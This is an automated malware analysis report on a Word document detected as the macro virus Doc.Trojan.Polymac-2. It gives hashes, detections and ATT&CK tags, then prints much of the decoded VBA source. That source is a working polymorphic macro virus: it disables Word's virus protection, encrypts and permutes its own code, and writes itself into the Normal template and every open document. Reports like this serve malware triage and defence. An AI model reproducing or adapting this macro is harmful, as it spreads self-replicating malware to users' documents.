Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7ee513fc42c9fc83…

MALICIOUS

Office (OLE)

93.5 KB Created: 1999-11-06 14:31:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: ac7de3cfa11183fc93d458437878ae4d SHA-1: 263984c77beac102a983620450bd5cf1f5fd1ed6 SHA-256: 7ee513fc42c9fc83a66f0ace992726e4f9b07ce67c4ba61545b8e6d705da455d
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with multiple critical detections, including 'Doc.Trojan.Polymac-2' and 'Win.Trojan.C-286' on an extracted artifact. It contains a VBA macro that executes upon document close, which attempts to compile and insert code into other documents, suggesting a mechanism for propagation or payload delivery. The macro's complexity and self-modification routines indicate a sophisticated downloader or dropper.

Heuristics 3

  • ClamAV: Doc.Trojan.Polymac-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Polymac-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 60457 bytes
SHA-256: 955f24cb1cf791a9422b871e78b9e414f6530fba1d44cd074d9dcf3e9320a962
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
 Randomize
 CrStr = getname()
 SetAttr NormalTemplate.Path + "\" + NormalTemplate, 0
 'Permutation PolyMac
 'Macros used MacroCryptedPolymorphicRealisticAntiheuristicCodeEngine
 'by CyberShadow v2.0
 'No ideas to new versions :(
 With Application
  .EnableCancelKey = True
  .ScreenUpdating = False
  .ShowVisualBasicEditor = False
 End With
 With Options
  .ConfirmConversions = False
  .SaveNormalPrompt = False
  .VirusProtection = False
 End With
 Call compile(CryptedString, r11, r21, r23, CrStr)
 CrypteS = ""
 Call insertToText(CryptedString, r11, r21, r23, CrStr, CryptedS, ProceduresCounter)
 CryptedS = "Private Sub Document_Open()" + Chr$(13) + Chr$(10) + CryptedS
 CryptedS = CryptedS + Chr$(13) + Chr$(10) + "End Sub" + Chr$(13) + Chr$(10) + ProceduresCounter
 Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
 If NT.lines(1, 1) = "" Then NT.Insertlines 1, CryptedS
 If Documents.Count > 1 Then
  aff = ActiveDocument
  For Each aDoc In Documents
   If aDoc.Name <> aff Then
    Documents(aDoc.Name).Activate
    Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
    If AD.lines(1, 1) = "" Then AD.Insertlines 1, CryptedS
   End If
  Next
  If ActiveDocument.Name <> aff Then Documents(aff).Activate
 End If
 Application.ScreenUpdating = True
End Sub
Private Function getname()
 c = ""
 For i = 1 To Int(Rnd * 7) + 1
  b = Int(Rnd * 26) + 65
  If Rnd > 0.5 Then b = b + 32
  c = c + Chr$(b)
 Next
 c = c + Chr$(Asc("0") + Int(Rnd * 9))
 getname = c
End Function
Private Sub compile(CryptedString, r11, r21, r23, CrStr)
 Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
 a = AD.lines(1, AD.countoflines)
 CryptedString = CrStr + "="
 fl = 0
 r1 = Int(Rnd * 255)
 r2 = Int(Rnd * 255)
 r3 = Int(Rnd * 255)
 r11 = r1: r21 = r2: r23 = r3
 For i = 1 To Len(a)
  b = Asc(Mid$(a, i, 1))
  r1 = (r1 + r2) Mod 255
  r2 = (r1 + r3) Mod 255
  r3 = (r2 + r1) Mod 255
  b = b Xor r3
  If (b < 33) Or b = Asc("""") Or b = Asc("+") Or b = Asc("_") Or b = Asc("^") Then
    If fl = 1 Then CryptedString = CryptedString + """"
    CryptedString = CryptedString + "+chr$(" + Str$(b) + ") ": fl = 0
   Else
    If fl = 0 Then
     If Mid$(CryptedString, Len(CryptedString) - 1, 1) = ")" Then CryptedString = CryptedString + "+"
     CryptedString = CryptedString + """"
    End If
    CryptedString = CryptedString + Chr$(b): fl = 1
  End If
 Next
 If Mid$(CryptedString, Len(CryptedString) - 1, 1) <> " " And Mid$(CryptedString, Len(CryptedString) - 1, 1) <> ")" Then CryptedString = CryptedString + """"
End Sub
Private Sub insertToText(CryptedString, r11, r21, r23, CrStr, CryptedS, ProceduresCounter)
 Call CorrectLine(CryptedString, CrStr, CryptedS)
 Call MakingDecryptor(r11, r21, r23, CrStr, CryptedS, myVars)
 Call PermuteCryptedBody(CryptedS, myVars, ProceduresCounter)
End Sub
Private Sub CorrectLine(CryptedString, CrStr, CryptedS)
 maxlen = Int(Rnd * 100) + 100
 c = "": l = 0: f2 = -1
 For i = 1 To Len(CryptedString)
  b = Mid$(CryptedString, i, 1)
  If b = """" Then f2 = -f2
  If l > maxlen And f2 = 1 Then
   c = c + """"
   CryptedS = CryptedS + c + Chr$(13) + Chr$(10)
   maxlen = Int(Rnd * 100) + 100
   c = CrStr + "=" + CrStr + "+""": l = Len(c)
  End If
  If b = "+" And l >= maxlen Then
   CryptedS = CryptedS + c + Chr$(13) + Chr$(10)
   maxlen = Int(Rnd * 100) + 100
   c = CrStr + "=" + CrStr: l = Len(c)
  End If
  c = c + b: l = l + 1
 Next
 CryptedS = CryptedS + c + Chr$(13) + Chr$(10)
End Sub
Private Sub MakingDecryptor(r11, r21, r23, CrStr, CryptedS, myVars)
 VarCount = 8
 ReDim a(VarCount)
 myVars = "(" + CrStr
 For i = 1 To VarCount
  Do
   a1 = 0
   a(i) = getname()
   For j = 1 To i - 1
    If a(i) = a(j) Then a1 = 1
   Next
  Loop While
... (truncated)